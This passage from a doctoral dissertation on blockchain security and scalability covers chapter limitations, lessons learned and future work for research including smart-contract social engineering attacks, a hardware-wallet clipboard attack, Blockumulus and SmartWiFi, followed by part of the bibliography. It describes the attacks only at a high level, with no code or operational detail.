transaction scheme called Hash Chain-based Network Connectivity Satisfaction Acknowledgement
(Hansa), which enables fast and low-cost provider-client protocol by restricting otherwise unac-
ceptable delays and fees associated with blockchain interaction. In addition, we present DupSet,
a dynamic user-perceived speed estimation technique, which can reliably evaluate the quality of
Internet connection from the users’ perspective. We design and implement SmartWiFi desktop and
mobile apps using an Ethereum smart contract. With extensive experimental evaluation, we demon-
strate that SmartWiFi exhibits rapid execution with low communication overhead and reduced fees.
8.2: Limitations and Discussion
Although the research described in this dissertation makes significant contribution to the field of
blockchain integration, our work obviously has limitations and room for further improvement. Be-
low are...
Social Engineering Attacks in Smart Contracts: In this dissertation, we have highlighted crucial
security vulnerabilities in Ethereum smart contracts caused by social engineering attacks. While
this work contributes significantly to understanding these threats, there are certain limitations and
future work requirements that need to be addressed. First, the work focuses on Ethereum smart
contracts, which, although being the most widely used, are not the only existing smart contract
platforms. Extending the analysis to other platforms such as Binance Smart Chain, Cardano, and
Polkadot can provide a comprehensive understanding of social engineering vulnerabilities across
the blockchain ecosystem. Second, social engineering attacks continue to evolve, and as new tech-
niques emerge, your study may require updates to stay relevant. Regularly updating the research
with the latest attack vectors can help practitioners better protect against evolving threats. Third,
                                                 198


while the work addresses technical aspects of social engineering attacks, it is essential to focus on
human factors contributing to the success of these attacks, such as cognitive biases and susceptibil-
ity to manipulation. Future work can explore psychological and behavioral aspects to design more
effective countermeasures. Fifth, the the work identifies vulnerabilities and possible attack vectors
but could benefit from a deeper exploration of mitigation strategies. Expanding the research to
propose and evaluate concrete solutions, such as secure coding practices, enhanced auditing, and
education initiatives, can help developers and users fortify their defenses against social engineering
attacks. Sixth, the work can be strengthened by analyzing real-world instances of social engineer-
ing attacks on Ethereum smart contracts. These case studies will provide valuable insights into
how attackers exploit vulnerabilities and the consequences of these breaches. Last but not least,
our future work can benefit from collaboration between cybersecurity, social science, and legal
experts to develop a holistic approach in understanding and addressing social engineering threats
in smart contracts. Addressing these limitations and focusing on future work will not only improve
the quality of our future research but also contribute to advancing the understanding and mitigation
of social engineering attacks in smart contracts and the broader blockchain ecosystem.
Attacking Hardware Wallets: In this dissertation, we introduce an innovative attack vector that
exploits clipboard manipulation to target hardware wallets. This work, however, has some limita-
tions that need to be addressed and areas where future work is required. First, the work primarily
focuses on EthClipper’s impact on Ethereum-based hardware wallets. Investigating the potential
of similar attacks on other cryptocurrencies (e.g., Bitcoin, Litecoin) and wallet types (e.g., soft-
ware wallets, mobile wallets) will help provide a broader perspective on the risks associated with
clipboard meddling attacks. Second, the work only presents one method for evading address verifi-
cation mechanisms. Future work can explore other potential evasion techniques, as well as assess
the effectiveness of existing countermeasures in protecting against these attacks. Third, although
our dissertation identifies the vulnerabilities and attack vectors, it could benefit from a more in-
depth analysis of potential countermeasures and mitigation strategies. Proposing and evaluating
solutions to prevent or detect clipboard meddling attacks, such as secure clipboard APIs, behav-
                                                  199


ioral analytics, and user education, will contribute to strengthening the security of hardware wal-
lets and the wider cryptocurrency ecosystem. Fourth, our research would benefit from analyzing
real-world instances of clipboard meddling attacks on hardware wallets. Examining such cases can
provide valuable insights into the tactics used by attackers, the effectiveness of existing defenses,
and the consequences of these security breaches. Fifth, our future work can explore the balance
between user experience and security in the context of hardware wallets. Investigating usability
aspects that may inadvertently contribute to the success of clipboard meddling attacks can inform
the design of more secure and user-friendly wallet solutions. Finally, we should consider analyz-
ing clipboard meddling attacks across various operating systems and platforms, such as Windows,
macOS, Linux, Android, and iOS, to gain a comprehensive understanding of the risks and potential
mitigation strategies.
Taxonomy of Threat Mitigation in Smart Contracts: In this dissertation, we provide a compre-
hensive overview of security threats and mitigation techniques for smart contracts. However, there
are certain limitations that need to be addressed, and areas where future work is required. First, se-
curity threats and mitigation techniques evolve over time. The survey paper may become outdated
as new threats and solutions emerge. Periodically updating the survey with the latest developments
will help maintain its relevance and usefulness to practitioners and researchers. Second, he survey
primarily focuses on Ethereum-based smart contracts. However, various other smart contract plat-
forms exist, such as Binance Smart Chain, Cardano, and Polkadot. Extending the survey to cover
security threats and mitigation techniques for these platforms will provide a more comprehensive
understanding of the smart contract security landscape. Third, the work covers technical aspects of
smart contract security but could benefit from incorporating insights from other disciplines, such
as legal, economic, and social sciences. Integrating these perspectives can lead to a more holis-
tic understanding of security challenges and potential solutions in the smart contract ecosystem.
Fourth, as the field of smart contracts and blockchain technology continues to advance, new tools
and techniques are being developed. Future work can explore the impact of emerging technologies,
such as zero-knowledge proofs, formal verification, and secure multi-party computation, on smart
                                                 200


contract security and threat mitigation. Fifth, usability and security trade-offs: The survey paper
can benefit from a discussion on the trade-offs between usability and security in the design and
implementation of smart contracts. Understanding these trade-offs can help guide the development
of more secure and user-friendly smart contract solutions. Finally, including real-world case stud-
ies of smart contract security breaches, their consequences, and the efficacy of various mitigation
techniques will provide valuable context and practical insights for the survey’s audience.
Real-Time Transaction Testing: In this dissertation, we present a novel approach to enhance
the security and efficiency of Ethereum smart contracts by encapsulating transactions in real-time.
While this work contributes significantly to the field, there are certain limitations that need to be
addressed and areas where future work is required: First, our approach can benefit from a more
extensive performance evaluation of the transaction encapsulation approach. This may include
analyzing the overhead introduced by transaction encapsulation, the impact on transaction through-
put, and the scalability of the approach in different scenarios and network conditions. Second, a
detailed security analysis of the transaction encapsulation approach is essential to understand its
effectiveness in mitigating potential attacks and vulnerabilities. Future work can explore possible
attack vectors that may target the encapsulation mechanism and evaluate the efficacy of the TxT
approach in addressing these threats. Third, investigating the compatibility and integration chal-
lenges of the TxT tester with existing smart contract development and deployment tools, such as
Truffle, and Remix, will help identify potential barriers to adoption and guide the development
of more seamless integration strategies. Fourth, as the blockchain ecosystem continues to evolve,
interoperability between different platforms is becoming increasingly important. Future work can
explore the potential of the transaction encapsulation approach in facilitating cross-chain commu-
nication and bridging different blockchain networks. Finally, it is important to consider the impact
of the transaction encapsulation testing approach on user experience and adoption, as these factors
are crucial for its success. Investigating the ease of use, potential learning curve, and changes to
existing workflows for developers and end-users can help inform the design and development of
more user-friendly transaction encapsulation solutions.
                                                 201


Smart Contracts on the Cloud: In this dissertation, we present an innovative framework that
leverages cloud computing to enhance the scalability of smart contract execution. While this work
contributes significantly to the field, there are some limitations to address and areas where future
work is required. First, cloud-based infrastructure introduces new security and privacy challenges.
A detailed analysis of the potential security risks and privacy implications of the Blockumulus
framework is crucial to ensure its robustness and reliability. Future work can explore the inte-
gration of advanced security techniques, such as zero-knowledge proofs and secure multi-party
computation, to address these concerns. Second, our work can benefit from a comprehensive cost
analysis of the Blockumulus framework, comparing the costs of on-chain and off-chain computa-
tion and storage, as well as the trade-offs between scalability, performance, and costs associated
with using cloud-based infrastructure. Third, further performance evaluation of the Blockumulus
framework is essential to understand its scalability and efficiency. This may include analyzing var-
ious performance metrics such as transaction throughput, latency, and resource utilization under
different workloads and network conditions. Finally, investigating the challenges and barriers to
deploying and adopting the Blockumulus framework, including compatibility with existing tools,
legal and regulatory considerations, and user acceptance, can help guide the development of more
practical and widely-adopted solutions.
Decentralized Wi-Fi Hotspots: We propose in this dissertation a new solution that leverages smart
contracts to provide secure and universal access to WiFi hotspots. Yet, the work has some limi-
tations and room for future improvement. First, a comprehensive cost analysis of the SmartWiFi
system is necessary to understand the trade-offs between access fees, infrastructure costs, and trans-
action fees associated with smart contract execution. This would help users and hotspot providers
make informed decisions regarding the adoption and deployment of the SmartWiFi system. Sec-
ond, investigating dynamic pricing models and incentive mechanisms to optimize the allocation of
WiFi resources and encourage more hotspot providers to participate in the SmartWiFi ecosystem.
This could involve the use of game theory, auction mechanisms, or reputation systems to create
a fair and economically efficient marketplace. Third, it is important to conduct pilot studies or
                                                  202


real-world deployments of the SmartWiFi system in various environments, such as urban centers,
airports, or university campuses, to validate its performance, usability, and security under differ-
ent conditions. This would help identify potential challenges, gather user feedback, and refine the
SmartWiFi solution based on real-world experiences.
8.3: Lessons Learned
Blockchain is still an emergent technology undergoing a steady integration into the Smart World
ecosystem. Unsurprisingly, the new technology is strewn with common misconceptions and sur-
prising discoveries. Our understanding of blockchain changed as we researched it further. Below
are some most important lessons that we have learned in the course of the research delivered in this
dissertation.
Human-in-the-Loop: Smart contracts are designed and implemented by human developers to in-
teract with human users, in which the human is the central component of a smart contract ecosystem.
Yet, most existing smart contract security studies do not take the human factor seriously. We are the
first to study social engineering attacks in smart contracts. We developed six zero-day attacks and
demonstrated that most of them remain dormant on the testnet and activate their malicious capacity
only when deployed on a production network.
Blockchain Evolution, not Revolution: A significant motivational factor for blockchain integra-
tion is that the technology practically enables smart contracts, which existed only as a concept
before the era of blockchain. Together blockchain and smart contracts deliver some unique impor-
tant properties, such as full or partial decentralization, non-repudiation, permanent recording, and
trustless computation. These key properties enable a broad spectrum of important decentralized
applications, such as: decentralized finance, various data certifications and proofs, unaffiliated
identity and key management, different voting and election schemes, legal contracts, and many
more — spurring the notion of blockchain as a revolutionary technology. However, the reality
suggests that despite its enormous potential, there is nothing revolutionary about blockchain. Our
research and careful observation suggest, that instead of a blockchain revolution, we are facing a
                                                  203


steady blockchain evolution. Specifically, like any other technology, blockchain began with the
idea (e.g., fair machine), followed by specific concepts (e.g., reasonably hard computation), then
turning into first prototypes (e.g., Ethereum). The next step, integration, is a painstaking process of
making the technology more secure, scalable, and usable — which is the main goal of the research
in this dissertation.
Distributed Service versus Utility: Our research shows that distributed computation is transition-
ing from the concept of service towards the concept of next-generation utility, which is to be be
provided in a generic form, separated from specific apps. For example, using cloud as a utility al-
lows a smartphone user to “plug” their apps to the cloud(s) of their choice, instead of using the cloud
predetermined by developers. Furthermore, we discovered sufficient evidence that cloud providers’
existing user data collection practices often breach user privacy, which necessitates the use of zero-
knowledge protocols. As the first step in this evolutionary transformation, we created the first
distributed framework for smart contracts on the cloud called Blockumulus. Instead of completely
replacing blockchain with a cloud, Blockumulus uses the Ethereum blockchain as a guarantor of the
permissionless properties of cloud contracts. Our future vision of privacy-preserving cloud with
sovereign identities further elaborates on the idea of distributed computation-as-a-utility.
Scalability is Multi-Dimensional: Blockchain is notorious for trading performance for decen-
tralization, known as the blockchain scalability problem that manifests in limited computation,
bounded data storage, and insufficient transaction throughput. In addition to the performance-
decentralization trade-off, sometimes referred to as the blockchain scalability trilemma [140], we
also discovered an inter-performance trade-off in decentralized distributed systems, which in-
cludes the balance between transaction throughput, computation, and data storage. To tackle this
problem, we proposed a shift of approach. Instead of delivering scalability to blockchain, as in
previous solutions, we port blockchain properties into a distributed system that is already scalable,
i.e., cloud.
                                                 204


8.4: Future Work
In the future, we will continue advancing the frontier of adoption of decentralized distributed sys-
tems by addressing their security, scalability, and usability challenges, as outlined below.
Security Data Flow Analysis via Parsing: Our preliminary work demonstrates the ability to au-
tomatically detect some covert security threats, such as overflows and backdoors, across a broad
spectrum of software. Our novel approach proceeds in two steps: 1) parse the source code (using
the RPLY or similar framework) with a special augmented grammar to extract some important facts;
2) use the extracted facts for security data flow analysis (DFA) based on the Datalog declarative
logical language. We recently applied this methodology to find security issues related to unsafe de-
pendency between Ethereum accounts in smart contracts. Our preliminary evaluation corroborates
the accuracy and efficiency of the approach. Thus, this approach has a potential to be developed
into a new general security method suitable for addressing a wide variety of security issues in
multiple domains.
Privacy-Preserving Cloud with Self-Sovereign Identities: Previous attempts to make the cloud
more privacy-preserving, user-centered, and versatile are scarce and address only a small subset of
existing problems. To address the shortage of such systems, we envision a new paradigm called
Cloud 2.0, which introduces the concept of Data-Execution Models (DEMs) for safeguarding and
managing the communication among client apps, distributed services, and external actors (e.g.,
other apps). As a result, our new cloud will enable the following three properties: 1) guaranteed
user-controlled redundancy: if one service is down, the remaining ones continue working; 2) sepa-
ration of apps from services: the user can switch, connect, or disconnect services according to their
needs without switching to different apps; 3) enforced privacy: the user can have full control of
their data by design, not by promise. Achieving this ambitious vision requires extensive research
to address significant technical challenges that Cloud 2.0 faces, including, but not limited to, DEM
security, backward compatibility, DEM upgrade, scalability, and performance.
Friction-Free Public-Key Authentication: Traditional password-based authentication is associ-
                                                 205


ated with many security, privacy, and usability issues. As opposed to that, public-key authentication
enhances privacy, security, and flexibility. Some popular services, such as GitHub and Ethereum,
successfully use public-key authentication. Yet, the adoption of this approach by many services is
impeded by the necessity for users to learn new concepts and perform additional steps (e.g., key
generation), which is called the technological friction. Overcoming the friction associated with
public-key authentication requires creating novel applied cryptography protocols for seamless gen-
eration of private keys, account storage, and public-key signatures. Moreover, these protocols must
be compatible with legacy systems. As a result, usable public-key authentication can address many
existing security and privacy problems in the modern world.
                                                 206


                                      BIBLIOGRAPHY
 [1] The average number of credit card transactions per day & year. https://www.cardrates.com/
     advice/number-of-credit-card-transactions-per-day-year/. Accessed: 2021-01-12.
 [2] eduroam - World Wide Education Roaming for Research & Education.               https://www.
     eduroam.org/. Accessed: 2020-05-10.
 [3] ETH Gas Station. https://ethgasstation.info/. Accessed: 2020-05-17.
 [4] Ethereum average transaction fee.
     https://ycharts.com/indicators/ethereum_average_transaction_fee. Accessed: 2021-01-13.
 [5] Ethereum daily transactions chart. https://etherscan.io/chart/tx. Accessed: 2021-01-13.
 [6] Solidity coverage. https://github.com/sc-forks/solidity-coverage. Accessed: 2021-11-12.
 [7] Waffle. https://getwaffle.io/. Accessed: 2021-11-12.
 [8] Cisco meraki for sp public wifi. http://marketo.meraki.com/rs/010-KNZ-501/images/
     Meraki_for_SP_Public_WiFi.pdf, 2019. Accessed: 2020-04-03.
 [9] Cloud managed networking. https://www.arubanetworks.com/solutions/cloud-managed/,
     2019. Accessed: 2020-04-10.
[10] Digitalocean. https://www.digitalocean.com, 2019. Accessed: 2020-04-03.
[11] Infura: Scalable blockchain infrastructure. https://github.com/INFURA, 2019. Accessed:
     2020-04-03.
[12] Passpoint. https://www.wi-fi.org/discover-wi-fi/passpoint, 2019. Accessed: 2020-04-03.
[13] Qlc chain. https://medium.com/qlc-chain/chain/home, 2019. Accessed: 2020-04-03.
[14] Ruckus        cloud      wi-fi.                   https://www.ruckuswireless.com/products/
     system-management-control/cloud-wifi, 2019. Accessed: 2020-04-03.
[15] Winq. https://winq.net/, 2019. Accessed: 2020-04-03.
[16] BIP-32 Protocol. https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki, 2020.
     Accessed: 2020-02-27.
[17] Ledger SAS. https://www.ledger.com, 2020. Accessed: 2020-02-27.
[18] Satoshi Labs. https://satoshilabs.com/, 2020. Accessed: 2020-02-27.
[19] ShapeShift. https://shapeshift.io, 2020. Accessed: 2020-02-27.
[20] Ethereum development documentation. https://ethereum.org/en/developers/docs/, 2021.
[21] Ethereum virtual machine opcodes. https://www.ethervm.io/, 2021.
                                              207


[22] Infura. https://infura.io/, 2021.
[23] Myetherwallet. https://www.myetherwallet.com/, 2021.
[24] Pokt. https://pokt.network/, 2021.
[25] Artificial intelligence (AI) for cybersecurity.               https://www.ibm.com/security/
     artificial-intelligence, 2022. Accessed: 2022-03-07.
[26] Dedadub Contract Library. https://dedaub.com/contract-library, 2022. Accessed: 2022-02-
     28.
[27] EOS.IO Technical White Paper v2.
     https://github.com/EOSIO/Documentation/blob/master/TechnicalWhitePaper.md,           2022.
     Accessed: 2022-03-07.
[28] Etherscan Token Tracker. https://etherscan.io/tokens, 2022. Accessed: 2022-03-05.
[29] Go implementation of mev-auction for ethereum. https://github.com/flashbots/mev-geth,
     2022.
[30] Miner extractable value (mev). https://ethereum.org/en/developers/docs/mev/, 2022.
[31] MythX. https://mythx.io/, 2022. Accessed: 2022-02-26.
[32] Neo White Paper. https://docs.neo.org/v2/docs/en-us/basic/whitepaper.html, 2022. Ac-
     cessed: 2022-03-07.
[33] OpenZeppelin Contracts. https://openzeppelin.com/contracts/, 2022. Accessed: 2022-02-
     28.
[34] Polygon. https://polygon.technology/, 2022.
[35] Rsk whitepaper.         https://www.rsk.co/Whitepapers/RSK_White_Paper-ORIGINAL.pdf,
     2022.
[36] Swc-100: Function default visibility. https://swcregistry.io/docs/SWC-100, 2022. Accessed:
     2022-03-21.
[37] Swc-107: Reentrancy. https://swcregistry.io/docs/SWC-107, 2022. Accessed: 2022-03-21.
[38] Swc-108: State variable default visibility. https://swcregistry.io/docs/SWC-108, 2022. Ac-
     cessed: 2022-03-21.
[39] Swc-119: Shadowing state variables. https://swcregistry.io/docs/SWC-119, 2022. Accessed:
     2022-04-17.
[40] Swc-123: Requirement violation. https://swcregistry.io/docs/SWC-123, 2022. Accessed:
     2022-03-10.
                                               208


[41] Swc-130: Right-to-left-override control character (u+202e). https://swcregistry.io/docs/
     SWC-130, 2022. Accessed: 2022-04-17.
[42] Swc registry. https://swcregistry.io/, 2022. Accessed: 2022-03-15.
[43] Z3prover/z3. https://github.com/Z3Prover/z3, 2022.
[44] Tesnim Abdellatif and Kei-Léo Brousmiche. Formal verification of smart contracts based
     on users and blockchain behaviors models. In 2018 9th IFIP International Conference on
     New Technologies, Mobility and Security (NTMS), pages 1–5. IEEE, 2018.
[45] Lawrence Abrams.                 Clipboard hijacker malware monitors 2.3 mil-
     lion bitcoin addresses.                   https://www.bleepingcomputer.com/news/security/
     clipboard-hijacker-malware-monitors-23-million-bitcoin-addresses/, 2018.
[46] Wolfgang Ahrendt, Richard Bubel, Joshua Ellul, Gordon J Pace, Raúl Pardo, Vincent Rebis-
     coul, and Gerardo Schneider. Verification of smart contract business logic. In International
     Conference on Fundamentals of Software Engineering, pages 228–243. Springer, 2019.
[47] Sefa Akca, Ajitha Rajan, and Chao Peng. Solanalyser: A framework for analysing and test-
     ing smart contracts. In 2019 26th Asia-Pacific Software Engineering Conference (APSEC),
     pages 482–489. IEEE, 2019.
[48] Elvira Albert, Jesús Correas, Pablo Gordillo, Guillermo Román-Díez, and Albert Rubio.
     Safevm: a safety verifier for ethereum smart contracts. In Proceedings of the 28th ACM
     SIGSOFT International Symposium on Software Testing and Analysis, pages 386–389, 2019.
[49] Elvira Albert, Pablo Gordillo, Albert Rubio, and Ilya Sergey. Running on fumes. In Interna-
     tional Conference on Verification and Evaluation of Computer and Communication Systems,
     pages 63–78. Springer, 2019.
[50] Emad Almutairi and Shiroq Al-Megren. Usability and security analysis of the keepkey wallet.
     In 2019 IEEE International Conference on Blockchain and Cryptocurrency (ICBC), pages
     149–153. IEEE, 2019.
[51] Sarra Alqahtani, Xinchi He, Rose Gamble, and Papa Mauricio. Formal verification of func-
     tional requirements for smart contract compositions in supply chain management systems.
     In Proceedings of the 53rd Hawaii International Conference on System Sciences, 2020.
[52] Sidney Amani, Myriam Bégel, Maksym Bortin, and Mark Staples. Towards verifying
     ethereum smart contract bytecode in isabelle/hol. In Proceedings of the 7th ACM SIGPLAN
     International Conference on Certified Programs and Proofs, pages 66–77, 2018.
[53] Elli Androulaki, Artem Barger, Vita Bortnikov, Christian Cachin, Konstantinos Christidis,
     Angelo De Caro, David Enyeart, Christopher Ferris, Gennady Laventman, Yacov Manevich,
     et al. Hyperledger fabric: a distributed operating system for permissioned blockchains. In
     Proceedings of the thirteenth EuroSys conference, pages 1–15, 2018.
                                               209


[54] Pedro Antonino and AW Roscoe. Solidifier: bounded model checking solidity using lazy
     contract deployment and precise memory modelling. In ACM Symposium on Applied Com-
     puting, pages 1788–1797, 2021.
[55] Andreas M Antonopoulos and Gavin Wood. Mastering Ethereum: Building Smart Contracts
     and Dapps. O’Reilly Media, 2018.
[56] Mauro Argañaraz, Mario Berón, Maria João Pereira, and Pedro Henriques. Detection of
     vulnerabilities in smart contracts specifications in ethereum platforms. In 9th Symposium on
     Languages, Applications and Technologies (SLATE 2020), volume 83, pages 1–16. Schloss
     Dagstuhl–Leibniz-Zentrum fuer Informatik, 2020.
[57] Nicola Atzei, Massimo Bartoletti, and Tiziana Cimoli. A survey of attacks on ethereum
     smart contracts (sok). In International conference on principles of security and trust, pages
     164–186. Springer, 2017.
[58] Nicola Atzei, Massimo Bartoletti, Stefano Lande, Nobuko Yoshida, and Roberto Zunino.
     Developing secure bitcoin contracts with bitml. In Proceedings of the 2019 27th ACM Joint
     Meeting on European Software Engineering Conference and Symposium on the Foundations
     of Software Engineering, pages 1124–1128, 2019.
[59] Xiaomin Bai, Zijing Cheng, Zhangbo Duan, and Kai Hu. Formal modeling and verification
     of smart contracts. In Proceedings of the 2018 7th international conference on software and
     computer applications, pages 322–326, 2018.
[60] Massimo Bartoletti and Roberto Zunino. Verifying liquidity of bitcoin contracts. In 8th
     International Conference on Principles of Security and Trust, POST 2019 Held as Part of
     the European Joint Conferences on Theory and Practice of Software, ETAPS 2019, volume
     11426, pages 222–247. Springer, 2019.
[61] Bernhard Beckert, Mihai Herda, Michael Kirsten, and Jonas Schiffl. Formal specification
     and verification of hyperledger fabric chaincode. In Proc. Int. Conf. Formal Eng. Methods,
     pages 44–48, 2018.
[62] Matthew Beedham.               This cryptocurrency stealing malware was blocked
     more than 360,000 times over the past year.                     https://thenextweb.com/news/
     cryptocurrency-malware-blocked-360000-times, 2019. Accessed: 2021-04-12.
[63] Elisa Bertino, Murat Kantarcioglu, Cuneyt Gurcan Akcora, Sagar Samtani, Sudip Mittal,
     and Maanak Gupta. Ai for security and security for ai. In Proceedings of the Eleventh ACM
     Conference on Data and Application Security and Privacy, pages 333–334, 2021.
[64] Karthikeyan Bhargavan, Antoine Delignat-Lavaud, Cédric Fournet, Anitha Gollamudi,
     Georges Gonthier, Nadim Kobeissi, Natalia Kulatova, Aseem Rastogi, Thomas Sibut-Pinote,
     Nikhil Swamy, et al. Formal verification of smart contracts: Short paper. In Proceedings of
     the 2016 ACM workshop on programming languages and analysis for security, pages 91–96,
     2016.
                                                210


[65] Giancarlo Bigi, Andrea Bracciali, Giovanni Meacci, and Emilio Tuosto. Validation of de-
     centralised smart contracts through game theory and formal methods. In Programming Lan-
     guages with Applications to Biology and Security, pages 142–161. Springer, 2015.
[66] Alex Biryukov, Dmitry Khovratovich, and Sergei Tikhomirov. Findel: Secure derivative
     contracts for ethereum. In International Conference on Financial Cryptography and Data
     Security, pages 453–467. Springer, 2017.
[67] David Bisson.                 Bitcoin stealer malware takes 60k using clip-
     board      modification       method.                  https://securityintelligence.com/news/
     bitcoin-stealer-malware-takes-60k-using-clipboard-modification-method/, 2018.
[68] Sujit Biswas, Kashif Sharif, Fan Li, Sabita Maharjan, Saraju P Mohanty, and Yu Wang. Pobt:
     A lightweight consensus algorithm for scalable iot business blockchain. IEEE Internet of
     Things Journal, 7(3):2343–2355, 2019.
[69] Joseph Bonneau, Andrew Miller, Jeremy Clark, Arvind Narayanan, Joshua A Kroll, and Ed-
     ward W Felten. Sok: Research perspectives and challenges for bitcoin and cryptocurrencies.
     In 2015 IEEE Symposium on Security and Privacy, pages 104–121, 2015.
[70] Priyanka Bose, Dipanjan Das, Yanju Chen, Yu Feng, Christopher Kruegel, and Giovanni
     Vigna. Sailfish: Vetting smart contract state-inconsistency bugs in seconds. arXiv preprint
     arXiv:2104.08638, 2021.
[71] Sean Bowe, Alessandro Chiesa, Matthew Green, Ian Miers, Pratyush Mishra, and Howard
     Wu. Zexe: Enabling decentralized private computation. In 2020 IEEE Symposium on Secu-
     rity and Privacy (SP), pages 947–964. IEEE, 2020.
[72] Santiago Bragagnolo, Henrique Rocha, Marcus Denker, and Stéphane Ducasse. Smartin-
     spect: solidity smart contract inspector. In 2018 International workshop on blockchain ori-
     ented software engineering (IWBOSE), pages 9–18. IEEE, 2018.
[73] Lorenz Breidenbach, Phil Daian, Ari Juels, and Emin Gün Sirer. An in-depth look at the
     parity multisig bug. Hacking, Distributed, July, 2017.
[74] Lorenz Breidenbach, Phil Daian, Florian Tramèr, and Ari Juels. Enter the hydra: Towards
     principled bug bounties and exploit-resistant smart contracts. In USENIX Security 18, pages
     1335–1352, 2018.
[75] Lexi Brent, Neville Grech, Sifis Lagouvardos, Bernhard Scholz, and Yannis Smaragdakis.
     Ethainter: A smart contract security analyzer for composite vulnerabilities. In Proceedings
     of the 41st ACM SIGPLAN Conference on Programming Language Design and Implemen-
     tation, pages 454–469, 2020.
[76] Lexi Brent, Anton Jurisevic, Michael Kong, Eric Liu, Francois Gauthier, Vincent Gramoli,
     Ralph Holz, and Bernhard Scholz. Vandal: A scalable security analysis framework for smart
     contracts. arXiv preprint arXiv:1809.03981, 2018.
                                               211


[77] R Browne.           Accidental bug may have frozen 280 million worth of digi-
     tal coin ether in a cryptocurrency wallet.                https://www.cnbc.com/2017/11/08/
     accidental-bug-may-have-frozen-280-worth-of-ether-on-parity-wallet.html, 2017.
[78] Vitalik Buterin. A next-generation smart contract and decentralized application platform.
     white paper, 2014.
[79] Vitalik Buterin, Eric Conner, Rick Dudley, Matthew Slipper, Ian Norden, and Abdelhamid
     Bakhta. Eip-1559: Fee market change for eth 1.0 chain. https://eips.ethereum.org/EIPS/
     eip-1559, 2019.
[80] Ramiro Camino, Christof Ferreira Torres, Mathis Baden, and Radu State. A data science
     approach for detecting honeypots in ethereum. In 2020 IEEE International Conference on
     Blockchain and Cryptocurrency (ICBC), pages 1–9. IEEE, 2020.
[81] Roberto Casado-Vara and Juan Corchado. Distributed e-health wide-world accounting
     ledger via blockchain. Journal of Intelligent & Fuzzy Systems, 36(3):2381–2386, 2019.
[82] Christian Catalini. How blockchain technology will impact the digital economy. Blockchains
     Smart Contracts Internet Things, 4:2292–2303, 2017.
[83] Ethan Cecchetti, Siqiu Yao, Haobin Ni, and Andrew C Myers. Compositional security for
     reentrant applications. contract, 12(13):14.
[84] Ethan Cecchetti, Siqiu Yao, Haobin Ni, and Andrew C Myers. Securing smart contracts
     with information flow. In International Symposium on Foundations and Applications of
     Blockchain, 2020.
[85] Ethan Cecchetti, Siqiu Yao, Haobin Ni, and Andrew C Myers. Compositional security for
     reentrant applications. arXiv preprint arXiv:2103.08577, 2021.
[86] Etherscan Information Center.          How to “cancel” ethereum pending transactions?
     https://info.etherscan.com/how-to-cancel-ethereum-pending-transactions/, 2021.
[87] ChainSecurity. Zero gas price transactions — what they do, who creates them, and why they
     might impact scalability. https://tinyurl.com/4rfpafp4, 2019.
[88] S Sibi Chakkaravarthy, D Sangeetha, and V Vaidehi. A survey on malware analysis and
     mitigation techniques. Computer Science Review, 32:1–23, 2019.
[89] Jialiang Chang, Bo Gao, Hao Xiao, Jun Sun, Yan Cai, and Zijiang Yang. scompile: Critical
     path identification and analysis for smart contracts. In International Conference on Formal
     Engineering Methods, pages 286–304. Springer, 2019.
[90] Nakul Chawla, Hans Walter Behrens, Darren Tapp, Dragan Boscovic, and K Selçuk Candan.
     Velocity: Scalability improvements in block propagation through rateless erasure coding.
     In 2019 IEEE International Conference on Blockchain and Cryptocurrency (ICBC), pages
     447–454. IEEE, 2019.
                                                212


 [91] Huashan Chen, Marcus Pendleton, Laurent Njilla, and Shouhuai Xu. A survey on ethereum
      systems security: Vulnerabilities, attacks, and defenses. ACM Computing Surveys (CSUR),
      53(3):1–43, 2020.
 [92] Jiachi Chen, Xin Xia, David Lo, John Grundy, Xiapu Luo, and Ting Chen. Defining smart
      contract defects on ethereum. IEEE Transactions on Software Engineering, 2020.
 [93] Jiachi Chen, Xin Xia, David Lo, John Grundy, Xiapu Luo, and Ting Chen. Defectchecker:
      Automated smart contract defect detection by analyzing evm bytecode. IEEE Transactions
      on Software Engineering, 2021.
 [94] Ting Chen, Rong Cao, Ting Li, Xiapu Luo, Guofei Gu, Yufei Zhang, Zhou Liao, Hang
      Zhu, Gang Chen, Zheyuan He, et al. Soda: A generic online detection framework for smart
      contracts. In NDSS. The Internet Society, 2020.
 [95] Ting Chen, Xiaoqi Li, Xiapu Luo, and Xiaosong Zhang. Under-optimized smart contracts
      devour your money. In 2017 IEEE 24th International Conference on Software Analysis,
      Evolution and Reengineering (SANER), pages 442–446. IEEE, 2017.
 [96] Ting Chen, Yufei Zhang, Zihao Li, Xiapu Luo, Ting Wang, Rong Cao, Xiuzhuo Xiao, and
      Xiaosong Zhang. Tokenscope: Automatically detecting inconsistent behaviors of cryptocur-
      rency tokens in ethereum. In Proc. of CCS, pages 1503–1520, 2019.
 [97] Weili Chen, Zibin Zheng, Jiahui Cui, Edith Ngai, Peilin Zheng, and Yuren Zhou. Detecting
      ponzi schemes on ethereum: Towards healthier blockchain technology. In Proceedings of
      the 2018 World Wide Web Conference, pages 1409–1418, 2018.
 [98] Raymond Cheng, Fan Zhang, Jernej Kos, Warren He, Nicholas Hynes, Noah Johnson, Ari
      Juels, Andrew Miller, and Dawn Song. Ekiden: A platform for confidentiality-preserving,
      trustworthy, and performant smart contracts. In 2019 IEEE European Symposium on Security
      and Privacy (EuroS&P), pages 185–200. IEEE, 2019.
 [99] Mung Chiang. Networked Life: 20 Questions and Answers, chapter How WiFi is different
      from cellular, pages 406–409. Cambridge University Press, 2012.
[100] Yuchiro Chinen, Naoto Yanai, Jason Paul Cruz, and Shingo Okamura. Ra: Hunting for re-
      entrancy attacks in ethereum smart contracts via static analysis. In 2020 IEEE International
      Conference on Blockchain (Blockchain), pages 327–336. IEEE, 2020.
[101] Vultr Holdings Corporation. Vultr. https://www.vultr.com, 2019. Accessed: 2020-04-03.
[102] Lorrie Faith Cranor, Serge Egelman, Jason I Hong, and Yue Zhang. Phinding phish: An
      evaluation of anti-phishing toolbars. In NDSS, pages 1–19, 2007.
[103] Xiaohai Dai, Jiang Xiao, Wenhui Yang, Chaofan Wang, and Hai Jin. Jidar: A jigsaw-like
      data reduction approach without trust assumptions for bitcoin system. In 2019 IEEE 39th
      International Conference on Distributed Computing Systems (ICDCS), pages 1317–1326.
      IEEE, 2019.
                                               213


[104] Josh Datko, Chris Quartier, and Kirill Belyayev. Breaking bitcoin hardware wallets. DEF
      CON 2017, 2017.
[105] Christian Decker and Roger Wattenhofer. Information propagation in the bitcoin network.
      In IEEE P2P 2013 Proceedings, pages 1–10. IEEE, 2013.
